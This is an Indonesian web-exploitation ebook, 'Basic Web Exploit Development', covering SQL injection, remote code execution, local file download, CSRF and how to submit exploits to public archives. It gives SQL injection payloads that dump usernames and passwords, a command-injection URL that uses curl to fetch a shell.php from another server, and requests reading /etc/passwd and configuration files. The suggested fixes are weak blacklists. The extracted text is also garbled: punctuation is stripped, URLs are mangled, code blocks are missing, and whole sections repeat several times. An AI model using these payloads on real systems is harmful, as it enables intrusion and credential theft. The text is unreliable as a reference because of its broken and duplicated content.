Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 14: Basic Web Exploit Development

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 15: Basic Web Exploit Development

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 16: Basic Web Exploit Development

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 17: Basic Web Exploit Development

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

